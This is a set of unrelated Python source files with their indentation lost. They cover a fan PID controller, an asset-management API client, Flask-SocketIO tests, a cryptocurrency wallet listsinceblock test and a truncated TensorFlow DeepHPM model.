mounts_used = JBoxDefaultConfigVol._get_config_mounts_used(cid)
if len(mounts_used) == 0:
return None
mount_used = mounts_used[0]
disk_path = os.path.join(JBoxDefaultConfigVol.FS_LOC, str(mount_used))
container_name = JBoxVol.get_cname(cid)
sessname = container_name[1:]
return JBoxDefaultConfigVol(disk_path, sessname=sessname)
@staticmethod
def refresh_user_home_image():
pass
def release(self, backup=False):
ensure_delete(self.disk_path, include_itself=True)
@staticmethod
def disk_ids_used_pct():
return 0
def _unpack_config(self):
if os.path.exists(self.disk_path):
JBoxDefaultConfigVol.log_debug("Config folder exists %s. Deleting...", self.disk_path)
ensure_delete(self.disk_path, include_itself=True)
JBoxDefaultConfigVol.log_debug("Config folder deleted %s", self.disk_path)
JBoxDefaultConfigVol.log_debug("Will unpack config to %s", self.disk_path)
os.mkdir(self.disk_path)
JBoxDefaultConfigVol.log_debug("Created config folder %s", self.disk_path)
self.restore_user_home(True)
JBoxDefaultConfigVol.log_debug("Restored config files to %s", self.disk_path)
self.setup_instance_config()
JBoxDefaultConfigVol.log_debug("Setup instance config at %s", self.disk_path)
|
the-stack_0_25909
|
#!/usr/bin/python
import sys, getopt, time
import sfan as f
from gpiozero import CPUTemperature
import datetime
class PID:
kp = 1
ki = 0
kd = 0
iSum = 0
iLimHi = 100
iLimLo = 0
lastErr = 0
dTerm = 0
outLimLo = 0
outLimHi = 100
def __init__(self, p, i, d):
self.kp = p
self.ki = i
self.kd = d
def update(self, err, dt):
self.iSum += self.ki * err * dt;
if self.iSum > self.iLimHi:
self.iSum = self.iLimHi
if self.iSum < self.iLimLo:
self.iSum = self.iLimLo
self.dTerm = (err - self.lastErr)/dt #optional filter might be added
self.lastErr = err;
out = self.ki * err + self.iSum + self.dTerm;
if out > self.outLimHi:
out = self.outLimHi
if out < self.outLimLo:
out = self.outLimLo
return out
def WriteToLog(temperature, fanPower):
f = open("SmartFan.csv", "a")
now = datetime.datetime.now()
f.write(now.strftime("%Y-%m-%d %H:%M:%S") + "," + str(temperature) + "," + str(fanPower) + "\n")
f.close()
def main(argv):
setTemp = 100
verb = False
log = False
logInt = 60
try:
opts, args = getopt.getopt(argv, "ht:v", ["help", "temp=", "verbose", "log="])
except getopt.error as err:
# Output error, and return with an error code
print(str(err))
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
print('loop.py -t <temperature> Maintain CPU temperature at set level (deg C)')
sys.exit()
elif opt in ("-v", "--verbose"):
verb = True
elif opt in ("-t", "--temp"):
setTemp = int(arg)
elif opt in ("-l", "--log"):
log = True
if len(arg) > 0:
logInt = int(arg)
if setTemp < 30 or setTemp > 80:
print('Invalid set temperature must be between 30 and 80 deg C!')
sys.exit(3)
cpu = CPUTemperature()
fanPid = PID(10, .8, .1)
logCount = 0
while(1):
time.sleep(1)
t = cpu.temperature
out = int(fanPid.update(t-setTemp, 1))
f.setPower(0, out)
if verb:
#print("CPU temperature:" + str(int(t)) + " FAN power: " + str(int(out)))
sys.stdout.write("CPU temperature: %d FAN power: %d%% \r" % (int(t), int(out)))
sys.stdout.flush()
if log:
logCount+= 1
if logCount >= logInt:
logInt = 0
WriteToLog(t, out)
if __name__ == "__main__":
main(sys.argv[1:])
|
the-stack_0_25910
|
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import Iterable
import json
import logging
from amaascore.assets.utils import json_to_asset
from amaascore.core.interface import Interface
from amaascore.core.amaas_model import json_handler
class AssetsInterface(Interface):
def __init__(
self,
environment=None,
endpoint=None,
logger=None,
username=None,
password=None,
session_token=None,
):
self.logger = logger or logging.getLogger(__name__)
super(AssetsInterface, self).__init__(
endpoint=endpoint,
endpoint_type="assets",
session_token=session_token,
environment=environment,
username=username,
password=password,
)
def new(self, asset):
self.logger.info(
"New Asset - Asset Manager: %s - Asset ID: %s",
asset.asset_manager_id,
asset.asset_id,
)
url = "%s/assets/%s" % (self.endpoint, asset.asset_manager_id)
response = self.session.post(url, json=asset.to_interface())
if response.ok:
self.logger.info(
"Successfully Created Asset - Asset Manager: %s - Asset ID: %s",
asset.asset_manager_id,
asset.asset_id,
)
asset = json_to_asset(response.json())
return asset
else:
self.logger.error(response.text)
response.raise_for_status()
def create_many(self, assets):
if not assets or not isinstance(assets, list):
raise ValueError("Invalid argument. Argument must be a non-empty list.")
self.logger.info("New Assets - Asset Manager: %s", assets[0].asset_manager_id)
url = "%s/assets/%s" % (self.endpoint, assets[0].asset_manager_id)
json_body = [asset.to_interface() for asset in assets]
response = self.session.post(url, json=json_body)
if response.ok:
self.logger.info(
"Successfully Created Assets - Asset Manager: %s",
assets[0].asset_manager_id,
)
assets = [asset for asset in response.json()]
return assets
else:
self.logger.error(response.text)
response.raise_for_status()
def upsert(self, asset):
""" upsert only support upserting one asset at a time"""
self.logger.info(
"Upsert Asset - Asset Manager: %s - Asset ID: %s",
asset.asset_manager_id,
asset.asset_id,
)
url = "%s/assets/%s" % (self.endpoint, asset.asset_manager_id)
response = self.session.post(
url, json=asset.to_interface(), params={"upsert": True}
)
if response.ok:
self.logger.info(
"Successfully Upserted Asset - Asset Manager: %s - Asset ID: %s",
asset.asset_manager_id,
asset.asset_id,
)
asset = json_to_asset(response.json())
return asset
else:
self.logger.error(response.text)
response.raise_for_status()
def amend(self, asset):
self.logger.info(
"Amend Asset - Asset Manager: %s - Asset ID: %s",
asset.asset_manager_id,
asset.asset_id,
)
url = "%s/assets/%s/%s" % (
self.endpoint,
asset.asset_manager_id,
asset.asset_id,
)
response = self.session.put(url, json=asset.to_interface())
if response.ok:
self.logger.info(
"Successfully Amended Asset - Asset Manager: %s - Asset ID: %s",
asset.asset_manager_id,
asset.asset_id,
)
asset = json_to_asset(response.json())
return asset
else:
self.logger.error(response.text)
response.raise_for_status()
def partial(self, asset_manager_id, asset_id, updates):
self.logger.info(
"Partial Amend Asset - Asset Manager: %s - Asset ID: %s",
asset_manager_id,
asset_id,
)
url = "%s/assets/%s/%s" % (self.endpoint, asset_manager_id, asset_id)
# Setting handler ourselves so we can be sure Decimals work
response = self.session.patch(
url,
data=json.dumps(updates, default=json_handler),
headers=self.json_header,
)
if response.ok:
asset = json_to_asset(response.json())
return asset
else:
self.logger.error(response.text)
response.raise_for_status()
def retrieve(self, asset_manager_id, asset_id, version=None):
self.logger.info(
"Retrieve Asset - Asset Manager: %s - Asset ID: %s",
asset_manager_id,
asset_id,
)
url = "%s/assets/%s/%s" % (self.endpoint, asset_manager_id, asset_id)
if version:
url += "?version=%d" % int(version)
response = self.session.get(url)
if response.ok:
self.logger.info(
"Successfully Retrieved Asset - Asset Manager: %s - Asset ID: %s",
asset_manager_id,
asset_id,
)
return json_to_asset(response.json())
else:
self.logger.error(response.text)
response.raise_for_status()
def deactivate(self, asset_manager_id, asset_id):
self.logger.info(
"Deactivate Asset - Asset Manager: %s - Asset ID: %s",
asset_manager_id,
asset_id,
)
url = "%s/assets/%s/%s" % (self.endpoint, asset_manager_id, asset_id)
json = {"asset_status": "Inactive"}
response = self.session.patch(url, json=json)
if response.ok:
self.logger.info(
"Successfully Deactivated Asset - Asset Manager: %s - Asset ID: %s",
asset_manager_id,
asset_id,
)
return json_to_asset(response.json())
else:
self.logger.error(response.text)
response.raise_for_status()
def loose_search(self, asset_manager_id, query="", **kwargs):
"""
Asset search API.
Possible kwargs:
* threshold: int (default = 0)
* page_no: int (default = 1)
* page_size: int (default = 100)
* sort_fields: list (default = [])
* asset_types: list (default = [])
* include_public: bool (default = True)
* include_data_sources: bool (default = True)
"""
self.logger.info("Asset Search - Asset Manager: %s", asset_manager_id)
url = "{endpoint}/assets/search/{asset_manager_id}".format(
asset_manager_id=asset_manager_id,
endpoint=self.endpoint,
)
params = {"query": query}
for k, v in kwargs.items():
if not isinstance(v, str) and isinstance(v, Iterable):
v = ",".join(str(i) for i in v)
params[k] = v
response = self.session.get(url, params=params)
if response.ok:
data = response.json()
assets = [json_to_asset(json_asset) for json_asset in data.get("hits", [])]
self.logger.info("Returned %s Assets.", len(assets))
return assets
else:
self.logger.error(response.text)
response.raise_for_status()
def search(self, asset_manager_id, **kwargs):
"""
Search for assets.
Possible kwargs:
* client_ids: list[int]
* asset_statuses: list
* asset_ids: list
* reference_types: list
* reference_values: list
* asset_issuer_ids: list[int]
* asset_classes: list
* asset_types: list
* country_ids: list
* currencies: list
* include_public: bool (default = True)
* include_data_sources: bool (default = True)
* page_no = int(query_params.get('page_no', '1')) if query_params else None
* page_size = int(query_params.get('page_size', '100')) if query_params else None
"""
self.logger.info("Search for Assets - Asset Manager: %s", asset_manager_id)
search_params = {}
for k, v in kwargs.items():
if not isinstance(v, str) and isinstance(v, Iterable):
v = ",".join(str(i) for i in v)
search_params[k] = v
url = "%s/assets/%s" % (self.endpoint, asset_manager_id)
response = self.session.get(url, params=search_params)
if response.ok:
return response.json() # Temporary hack since json won't map properly
assets = [json_to_asset(json_asset) for json_asset in response.json()]
self.logger.info("Returned %s Assets.", len(assets))
return assets
else:
self.logger.error(response.text)
response.raise_for_status()
def fields_search(
self,
asset_manager_id,
asset_ids=None,
asset_classes=None,
asset_types=None,
fields=None,
page_no=None,
page_size=None,
):
self.logger.info("Search for Assets - Asset Manager: %s", asset_manager_id)
search_params = {}
if asset_ids:
search_params["asset_ids"] = ",".join(asset_ids)
if asset_classes:
search_params["asset_classes"] = ",".join(asset_classes)
if asset_types:
search_params["asset_types"] = ",".join(asset_types)
if fields:
search_params["fields"] = ",".join(fields)
if page_no is not None:
search_params["page_no"] = page_no
if page_size:
search_params["page_size"] = page_size
url = "%s/assets/%s" % (self.endpoint, asset_manager_id)
response = self.session.get(url, params=search_params)
if response.ok:
asset_dicts = response.json()
self.logger.info("Returned %s Assets.", len(asset_dicts))
return asset_dicts
else:
self.logger.error(response.text)
response.raise_for_status()
def assets_by_asset_manager(self, asset_manager_id):
self.logger.info("Retrieve Assets By Asset Manager: %s", asset_manager_id)
url = "%s/assets/%s" % (self.endpoint, asset_manager_id)
response = self.session.get(url)
if response.ok:
assets = [json_to_asset(json_asset) for json_asset in response.json()]
self.logger.info("Returned %s Assets.", len(assets))
return assets
else:
self.logger.error(response.text)
response.raise_for_status()
def assets_lifecycle(self, asset_manager_id, business_date, asset_ids):
self.logger.info(
"Retrieve Assets Lifecycle. Asset Manager: %s", asset_manager_id
)
url = "%s/asset-lifecycle/%s" % (self.endpoint, asset_manager_id)
params = {
"business_date": business_date.isoformat(),
"asset_ids": ",".join(asset_ids),
}
response = self.session.get(url, params=params)
if response.ok:
asset_lifecycles = response.json()
self.logger.info("Returned %s Asset Lifecycles.", len(asset_lifecycles))
return asset_lifecycles
else:
self.logger.error(response.text)
response.raise_for_status()
def clear(self, asset_manager_id):
"""This method deletes all the data for an asset_manager_id.
It should be used with extreme caution. In production it
is almost always better to Inactivate rather than delete."""
self.logger.info("Clear Assets - Asset Manager: %s", asset_manager_id)
url = "%s/clear/%s" % (self.endpoint, asset_manager_id)
response = self.session.delete(url)
if response.ok:
count = response.json().get("count", "Unknown")
self.logger.info("Deleted %s Assets.", count)
return count
else:
self.logger.error(response.text)
response.raise_for_status()
def synch(self, asset_manager_id, **params):
"""
This method invokes a request to synch the assets in
dynamodb and/or elastic search with the SQL assets.
Args:
asset_manager_id (int): The id of the asset manager that owns the assets to be synched
cache (bool): Whether to synch the assets in DynamoDB
search (bool): Whether to synch the assets in Elasticsearch
page_no (int): The current page of assets to be synched.
page_size (int): The number of assets to be synched per request.
Returns:
int: the number of assets synched.
"""
self.logger.info("Synching Assets.")
url = "%s/synch/%s" % (self.endpoint, asset_manager_id)
response = self.session.put(url, params=params)
if response.ok:
count = response.json().get("count", 0)
self.logger.info("Synched %s Assets.", count)
return count
else:
self.logger.error(response.text)
response.raise_for_status()
|
the-stack_0_25912
|
from main import app, socketio, db
from flask import jsonify
from datetime import datetime
from dateutil import parser
class TestMain:
""" Tests for main.py. To run tests navigate to the 'back-end' directory and run: '$pytest' """
def get_test_client(self):
""" returns a socketio test client for the tests to use """
flask_test_client = app.test_client()
socketio_test_client = socketio.test_client(
app, flask_test_client=flask_test_client
)
return socketio_test_client
def wipe_db(self):
""" empties the db """
db.drop_all()
db.create_all()
def fill_db(self):
""" fills the db with test equations """
self.wipe_db()
socketio_test_client = self.get_test_client()
for i in range(25):
equation = f"{i} + {i}"
result = f"{i+i}"
socketio_test_client.emit(
"equation_added", {"equation": equation, "result": result}
)
def test_initial_fetch_empty(self):
""" tests that the initial equation fetch for an empty db """
self.wipe_db()
socketio_test_client = self.get_test_client()
flask_test_client = app.test_client()
socketio_test_client = socketio.test_client(
app, flask_test_client=flask_test_client
)
# make sure the connection gets established
assert socketio_test_client.is_connected()
# check that empty db returns nothing on initial connection
initial_fetch_empty = socketio_test_client.get_received()
initial_fetch_empty_payload = initial_fetch_empty.pop()["args"][0]
assert len(initial_fetch_empty_payload["equations"]) == 0
def test_insert_equations(self):
""" Tests the validity of inserted and then broadcasted equation data agains the origional data """
socketio_test_client = self.get_test_client()
self.wipe_db()
# add 25 equations to the db and check that server broadcasts its payload with id and timestamp back
for i in range(25):
equation = f"{i} + {i}"
result = f"{i+i}"
socketio_test_client.emit(
"equation_added", {"equation": equation, "result": result}
)
# get rebroadcasted payload
inserted = socketio_test_client.get_received()
inserted_payload = inserted.pop()["args"][0]
# validate payload
assert inserted_payload is not None
assert inserted_payload["id"] == i + 1
assert inserted_payload["equation"] == equation
assert inserted_payload["result"] == result
# check that timestamp is no more than 10 seconds old
date_string = inserted_payload["date_created"]
date_obj = date = parser.parse(date_string)
delta = (datetime.utcnow() - date_obj).total_seconds()
assert delta < 5
def test_initial_fetch_full(self):
""" Tests that the initial fetch on a db with more than 10 entries returns no more than 10 equations """
self.fill_db()
socketio_test_client = self.get_test_client()
# test that initial fetch returns no more than 10 equations despite 25 being in the db
assert socketio_test_client.is_connected()
# no 10 equations should come back
initial_fetch_full = socketio_test_client.get_received()
initial_fetch_full_payload = initial_fetch_full.pop()["args"][0]
assert len(initial_fetch_full_payload["equations"]) == 10
# end tests
socketio_test_client.disconnect()
# usefull for debugging tests
if __name__ == "__main__":
test_class = TestSocketApi()
test_class.test_initial_fetch_empty()
test_class.test_insert_equations()
test_class.test_initial_fetch_full()
|
the-stack_0_25914
|
#!/usr/bin/env python3
# Copyright (c) 2017-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the listsinceblock RPC."""
from test_framework.address import key_to_p2wpkh
from test_framework.key import ECKey
from test_framework.test_framework import RuvchainTestFramework
from test_framework.messages import BIP125_SEQUENCE_NUMBER
from test_framework.util import (
assert_array_result,
assert_equal,
assert_raises_rpc_error,
)
from test_framework.wallet_util import bytes_to_wif
from decimal import Decimal
class ListSinceBlockTest(RuvchainTestFramework):
def set_test_params(self):
self.num_nodes = 4
self.setup_clean_chain = True
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
# All nodes are in IBD from genesis, so they'll need the miner (node2) to be an outbound connection, or have
# only one connection. (See fPreferredDownload in net_processing)
self.connect_nodes(1, 2)
self.nodes[2].generate(101)
self.sync_all()
self.test_no_blockhash()
self.test_invalid_blockhash()
self.test_reorg()
self.test_double_spend()
self.test_double_send()
self.double_spends_filtered()
self.test_targetconfirmations()
def test_no_blockhash(self):
self.log.info("Test no blockhash")
txid = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), 1)
blockhash, = self.nodes[2].generate(1)
blockheight = self.nodes[2].getblockheader(blockhash)['height']
self.sync_all()
txs = self.nodes[0].listtransactions()
assert_array_result(txs, {"txid": txid}, {
"category": "receive",
"amount": 1,
"blockhash": blockhash,
"blockheight": blockheight,
"confirmations": 1,
})
assert_equal(
self.nodes[0].listsinceblock(),
{"lastblock": blockhash,
"removed": [],
"transactions": txs})
assert_equal(
self.nodes[0].listsinceblock(""),
{"lastblock": blockhash,
"removed": [],
"transactions": txs})
def test_invalid_blockhash(self):
self.log.info("Test invalid blockhash")
assert_raises_rpc_error(-5, "Block not found", self.nodes[0].listsinceblock,
"42759cde25462784395a337460bde75f58e73d3f08bd31fdc3507cbac856a2c4")
assert_raises_rpc_error(-5, "Block not found", self.nodes[0].listsinceblock,
"0000000000000000000000000000000000000000000000000000000000000000")
assert_raises_rpc_error(-8, "blockhash must be of length 64 (not 11, for 'invalid-hex')", self.nodes[0].listsinceblock,
"invalid-hex")
assert_raises_rpc_error(-8, "blockhash must be hexadecimal string (not 'Z000000000000000000000000000000000000000000000000000000000000000')", self.nodes[0].listsinceblock,
"Z000000000000000000000000000000000000000000000000000000000000000")
def test_targetconfirmations(self):
'''
This tests when the value of target_confirmations exceeds the number of
blocks in the main chain. In this case, the genesis block hash should be
given for the `lastblock` property. If target_confirmations is < 1, then
a -8 invalid parameter error is thrown.
'''
self.log.info("Test target_confirmations")
blockhash, = self.nodes[2].generate(1)
blockheight = self.nodes[2].getblockheader(blockhash)['height']
self.sync_all()
assert_equal(
self.nodes[0].getblockhash(0),
self.nodes[0].listsinceblock(blockhash, blockheight + 1)['lastblock'])
assert_equal(
self.nodes[0].getblockhash(0),
self.nodes[0].listsinceblock(blockhash, blockheight + 1000)['lastblock'])
assert_raises_rpc_error(-8, "Invalid parameter",
self.nodes[0].listsinceblock, blockhash, 0)
def test_reorg(self):
'''
`listsinceblock` did not behave correctly when handed a block that was
no longer in the main chain:
ab0
/ \
aa1 [tx0] bb1
| |
aa2 bb2
| |
aa3 bb3
|
bb4
Consider a client that has only seen block `aa3` above. It asks the node
to `listsinceblock aa3`. But at some point prior the main chain switched
to the bb chain.
Previously: listsinceblock would find height=4 for block aa3 and compare
this to height=5 for the tip of the chain (bb4). It would then return
results restricted to bb3-bb4.
Now: listsinceblock finds the fork at ab0 and returns results in the
range bb1-bb4.
This test only checks that [tx0] is present.
'''
self.log.info("Test reorg")
# Split network into two
self.split_network()
# send to nodes[0] from nodes[2]
senttx = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), 1)
# generate on both sides
nodes1_last_blockhash = self.nodes[1].generate(6)[-1]
nodes2_first_blockhash = self.nodes[2].generate(7)[0]
self.log.debug("nodes[1] last blockhash = {}".format(nodes1_last_blockhash))
self.log.debug("nodes[2] first blockhash = {}".format(nodes2_first_blockhash))
self.sync_all(self.nodes[:2])
self.sync_all(self.nodes[2:])
self.join_network()
# listsinceblock(nodes1_last_blockhash) should now include tx as seen from nodes[0]
# and return the block height which listsinceblock now exposes since a5e7795.
transactions = self.nodes[0].listsinceblock(nodes1_last_blockhash)['transactions']
found = next(tx for tx in transactions if tx['txid'] == senttx)
assert_equal(found['blockheight'], self.nodes[0].getblockheader(nodes2_first_blockhash)['height'])
def test_double_spend(self):
'''
This tests the case where the same UTXO is spent twice on two separate
blocks as part of a reorg.
ab0
/ \
aa1 [tx1] bb1 [tx2]
| |
aa2 bb2
| |
aa3 bb3
|
bb4
Problematic case:
1. User 1 receives RUV in tx1 from utxo1 in block aa1.
2. User 2 receives RUV in tx2 from utxo1 (same) in block bb1
3. User 1 sees 2 confirmations at block aa3.
4. Reorg into bb chain.
5. User 1 asks `listsinceblock aa3` and does not see that tx1 is now
invalidated.
Currently the solution to this is to detect that a reorg'd block is
asked for in listsinceblock, and to iterate back over existing blocks up
until the fork point, and to include all transactions that relate to the
node wallet.
'''
self.log.info("Test double spend")
self.sync_all()
# share utxo between nodes[1] and nodes[2]
eckey = ECKey()
eckey.generate()
privkey = bytes_to_wif(eckey.get_bytes())
address = key_to_p2wpkh(eckey.get_pubkey().get_bytes())
self.nodes[2].sendtoaddress(address, 10)
self.nodes[2].generate(6)
self.sync_all()
self.nodes[2].importprivkey(privkey)
utxos = self.nodes[2].listunspent()
utxo = [u for u in utxos if u["address"] == address][0]
self.nodes[1].importprivkey(privkey)
# Split network into two
self.split_network()
# send from nodes[1] using utxo to nodes[0]
change = '%.8f' % (float(utxo['amount']) - 1.0003)
recipient_dict = {
self.nodes[0].getnewaddress(): 1,
self.nodes[1].getnewaddress(): change,
}
utxo_dicts = [{
'txid': utxo['txid'],
'vout': utxo['vout'],
}]
txid1 = self.nodes[1].sendrawtransaction(
self.nodes[1].signrawtransactionwithwallet(
self.nodes[1].createrawtransaction(utxo_dicts, recipient_dict))['hex'])
# send from nodes[2] using utxo to nodes[3]
recipient_dict2 = {
self.nodes[3].getnewaddress(): 1,
self.nodes[2].getnewaddress(): change,
}
self.nodes[2].sendrawtransaction(
self.nodes[2].signrawtransactionwithwallet(
self.nodes[2].createrawtransaction(utxo_dicts, recipient_dict2))['hex'])
# generate on both sides
lastblockhash = self.nodes[1].generate(3)[2]
self.nodes[2].generate(4)
self.join_network()
self.sync_all()
# gettransaction should work for txid1
assert self.nodes[0].gettransaction(txid1)['txid'] == txid1, "gettransaction failed to find txid1"
# listsinceblock(lastblockhash) should now include txid1, as seen from nodes[0]
lsbres = self.nodes[0].listsinceblock(lastblockhash)
assert any(tx['txid'] == txid1 for tx in lsbres['removed'])
# but it should not include 'removed' if include_removed=false
lsbres2 = self.nodes[0].listsinceblock(blockhash=lastblockhash, include_removed=False)
assert 'removed' not in lsbres2
def test_double_send(self):
'''
This tests the case where the same transaction is submitted twice on two
separate blocks as part of a reorg. The former will vanish and the
latter will appear as the true transaction (with confirmations dropping
as a result).
ab0
/ \
aa1 [tx1] bb1
| |
aa2 bb2
| |
aa3 bb3 [tx1]
|
bb4
Asserted:
1. tx1 is listed in listsinceblock.
2. It is included in 'removed' as it was removed, even though it is now
present in a different block.
3. It is listed with a confirmation count of 2 (bb3, bb4), not
3 (aa1, aa2, aa3).
'''
self.log.info("Test double send")
self.sync_all()
# Split network into two
self.split_network()
# create and sign a transaction
utxos = self.nodes[2].listunspent()
utxo = utxos[0]
change = '%.8f' % (float(utxo['amount']) - 1.0003)
recipient_dict = {
self.nodes[0].getnewaddress(): 1,
self.nodes[2].getnewaddress(): change,
}
utxo_dicts = [{
'txid': utxo['txid'],
'vout': utxo['vout'],
}]
signedtxres = self.nodes[2].signrawtransactionwithwallet(
self.nodes[2].createrawtransaction(utxo_dicts, recipient_dict))
assert signedtxres['complete']
signedtx = signedtxres['hex']
# send from nodes[1]; this will end up in aa1
txid1 = self.nodes[1].sendrawtransaction(signedtx)
# generate bb1-bb2 on right side
self.nodes[2].generate(2)
# send from nodes[2]; this will end up in bb3
txid2 = self.nodes[2].sendrawtransaction(signedtx)
assert_equal(txid1, txid2)
# generate on both sides
lastblockhash = self.nodes[1].generate(3)[2]
self.nodes[2].generate(2)
self.join_network()
self.sync_all()
# gettransaction should work for txid1
tx1 = self.nodes[0].gettransaction(txid1)
assert_equal(tx1['blockheight'], self.nodes[0].getblockheader(tx1['blockhash'])['height'])
# listsinceblock(lastblockhash) should now include txid1 in transactions
# as well as in removed
lsbres = self.nodes[0].listsinceblock(lastblockhash)
assert any(tx['txid'] == txid1 for tx in lsbres['transactions'])
assert any(tx['txid'] == txid1 for tx in lsbres['removed'])
# find transaction and ensure confirmations is valid
for tx in lsbres['transactions']:
if tx['txid'] == txid1:
assert_equal(tx['confirmations'], 2)
# the same check for the removed array; confirmations should STILL be 2
for tx in lsbres['removed']:
if tx['txid'] == txid1:
assert_equal(tx['confirmations'], 2)
def double_spends_filtered(self):
'''
`listsinceblock` was returning conflicted transactions even if they
occurred before the specified cutoff blockhash
'''
self.log.info("Test spends filtered")
spending_node = self.nodes[2]
dest_address = spending_node.getnewaddress()
tx_input = dict(
sequence=BIP125_SEQUENCE_NUMBER, **next(u for u in spending_node.listunspent()))
rawtx = spending_node.createrawtransaction(
[tx_input], {dest_address: tx_input["amount"] - Decimal("0.00051000"),
spending_node.getrawchangeaddress(): Decimal("0.00050000")})
signedtx = spending_node.signrawtransactionwithwallet(rawtx)
orig_tx_id = spending_node.sendrawtransaction(signedtx["hex"])
original_tx = spending_node.gettransaction(orig_tx_id)
double_tx = spending_node.bumpfee(orig_tx_id)
# check that both transactions exist
block_hash = spending_node.listsinceblock(
spending_node.getblockhash(spending_node.getblockcount()))
original_found = False
double_found = False
for tx in block_hash['transactions']:
if tx['txid'] == original_tx['txid']:
original_found = True
if tx['txid'] == double_tx['txid']:
double_found = True
assert_equal(original_found, True)
assert_equal(double_found, True)
lastblockhash = spending_node.generate(1)[0]
# check that neither transaction exists
block_hash = spending_node.listsinceblock(lastblockhash)
original_found = False
double_found = False
for tx in block_hash['transactions']:
if tx['txid'] == original_tx['txid']:
original_found = True
if tx['txid'] == double_tx['txid']:
double_found = True
assert_equal(original_found, False)
assert_equal(double_found, False)
if __name__ == '__main__':
ListSinceBlockTest().main()
|
the-stack_0_25915
|
"""
@author: Maziar Raissi
"""
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import scipy.io
from scipy.interpolate import griddata
from mpl_toolkits.mplot3d import Axes3D
from pyDOE import lhs
import time
from plotting import newfig, savefig
import matplotlib.gridspec as gridspec
from mpl_toolkits.axes_grid1 import make_axes_locatable
###############################################################################
############################## Helper Functions ###############################
###############################################################################
def initialize_NN(layers):
weights = []
biases = []
num_layers = len(layers)
for l in range(0,num_layers-1):
W = xavier_init(size=[layers[l], layers[l+1]])
b = tf.Variable(tf.zeros([1,layers[l+1]]), dtype=tf.float32)
weights.append(W)
biases.append(b)
return weights, biases
def xavier_init(size):
in_dim = size[0]
out_dim = size[1]
xavier_stddev = np.sqrt(2/(in_dim + out_dim))
return tf.Variable(tf.truncated_normal([in_dim, out_dim], stddev=xavier_stddev), dtype=tf.float32)
def neural_net(X, weights, biases):
num_layers = len(weights) + 1
H = X
for l in range(0,num_layers-2):
W = weights[l]
b = biases[l]
H = tf.tanh(tf.add(tf.matmul(H, W), b))
W = weights[-1]
b = biases[-1]
Y = tf.add(tf.matmul(H, W), b)
return Y
###############################################################################
################################ DeepHPM Class ################################
###############################################################################
class DeepHPM:
def __init__(self, t, x, u,
x0, u0, tb, X_f,
u_layers, pde_layers,
layers,
lb_idn, ub_idn,
lb_sol, ub_sol):
# Domain Boundary
self.lb_idn = lb_idn
self.ub_idn = ub_idn
self.lb_sol = lb_sol
self.ub_sol = ub_sol
# Init for Identification
self.idn_init(t, x, u, u_layers, pde_layers)
# Init for Solution
self.sol_init(x0, u0, tb, X_f, layers)
# tf session
self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,
log_device_placement=True))
init = tf.global_variables_initializer()
self.sess.run(init)
###########################################################################
############################# Identifier ##################################
###########################################################################
def idn_init(self, t, x, u, u_layers, pde_layers):
# Training Data for Identification
self.t = t
self.x = x
self.u = u
# Layers for Identification
self.u_layers = u_layers
self.pde_layers = pde_layers
# Initialize NNs for Identification
self.u_weights, self.u_biases = initialize_NN(u_layers)
self.pde_weights, self.pde_biases = initialize_NN(pde_layers)
# tf placeholders for Identification
self.t_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.x_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.u_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.terms_tf = tf.placeholder(tf.float32, shape=[None, pde_layers[0]])
# tf graphs for Identification
self.idn_u_pred = self.idn_net_u(self.t_tf, self.x_tf)
self.pde_pred = self.net_pde(self.terms_tf)
self.idn_f_pred = self.idn_net_f(self.t_tf, self.x_tf)
# loss for Identification
self.idn_u_loss = tf.reduce_sum(tf.square(self.idn_u_pred - self.u_tf))
self.idn_f_loss = tf.reduce_sum(tf.square(self.idn_f_pred))
# Optimizer for Identification
self.idn_u_optimizer = tf.contrib.opt.ScipyOptimizerInterface(self.idn_u_loss,
var_list = self.u_weights + self.u_biases,
method = 'L-BFGS-B',
options = {'maxiter': 50000,
'maxfun': 50000,
'maxcor': 50,
'maxls': 50,
'ftol': 1.0*np.finfo(float).eps})
self.idn_f_optimizer = tf.contrib.opt.ScipyOptimizerInterface(self.idn_f_loss,
var_list = self.pde_weights + self.pde_biases,
method = 'L-BFGS-B',
options = {'maxiter': 50000,
'maxfun': 50000,
'maxcor': 50,
'maxls': 50,
'ftol': 1.0*np.finfo(float).eps})
self.idn_u_optimizer_Adam = tf.train.AdamOptimizer()
self.idn_u_train_op_Adam = self.idn_u_optimizer_Adam.minimize(self.idn_u_loss,
var_list = self.u_weights + self.u_biases)
self.idn_f_optimizer_Adam = tf.train.AdamOptimizer()
self.idn_f_train_op_Adam = self.idn_f_optimizer_Adam.minimize(self.idn_f_loss,
var_list = self.pde_weights + self.pde_biases)
def idn_net_u(self, t, x):
X = tf.concat([t,x],1)
H = 2*(X - self.lb_idn)/(self.ub_idn - self.lb_idn) - 1
u = neural_net(H, self.u_weights, self.u_biases)
return u
def net_pde(self, terms):
pde = neural_net(terms, self.pde_weights, self.pde_biases)
return pde
def idn_net_f(self, t, x):
u = self.idn_net_u(t, x)
u_t = tf.gradients(u, t)[0]
u_x = tf.gradients(u, x)[0]
u_xx = tf.gradients(u_x, x)[0]
u_xxx = tf.gradients(u_xx, x)[0]
terms = tf.concat([u,u_x,u_xx,u_xxx],1)
f = u_t - self.net_pde(terms)
return f
def idn_u_train(self, N_iter):
tf_dict = {self.t_tf: self.t, self.x_tf: self.x, self.u_tf: self.u}
start_time = time.time()
for it in range(N_iter):
self.sess.run(self.idn_u_train_op_Adam, tf_dict)
# Print
if it % 10 == 0:
elapsed = time.time() - start_time
loss_value = self.sess.run(self.idn_u_loss, tf_dict)
print('It: %d, Loss: %.3e, Time: %.2f' %
(it, loss_value, elapsed))
start_time = time.time()
self.idn_u_optimizer.minimize(self.sess,
feed_dict = tf_dict,
fetches = [self.idn_u_loss],
loss_callback = self.callback)
def idn_f_train(self, N_iter):
tf_dict = {self.t_tf: self.t, self.x_tf: self.x}
start_time = time.time()
for it in range(N_iter):
self.sess.run(self.idn_f_train_op_Adam, tf_dict)
# Print
if it % 10 == 0:
